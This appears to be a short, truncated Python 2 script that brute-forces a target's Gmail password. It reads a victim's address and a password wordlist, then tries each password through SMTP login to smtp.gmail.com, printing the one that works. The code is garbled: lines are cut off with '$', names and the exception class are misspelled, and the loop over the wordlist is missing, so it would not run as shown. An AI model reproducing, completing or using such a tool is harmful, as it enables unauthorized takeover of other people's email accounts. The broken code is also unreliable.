import smtplib
smtpserver = smtplib.SMTP('smtp.gmail.com',$
smtpserver.ehlo()
smtpserver.starttls()

user = raw_input("Enter the targets'email :$
passwfile = raw_inpot ("Enter the password $
passwfile = open(passwrdfile, "r")
        try :
                smtpserver.login( user , pa$
                print("[+] Password Find ==$
                break;
        except smtlip.STPAthenticationEror:
                print ("[!] Password is inc$
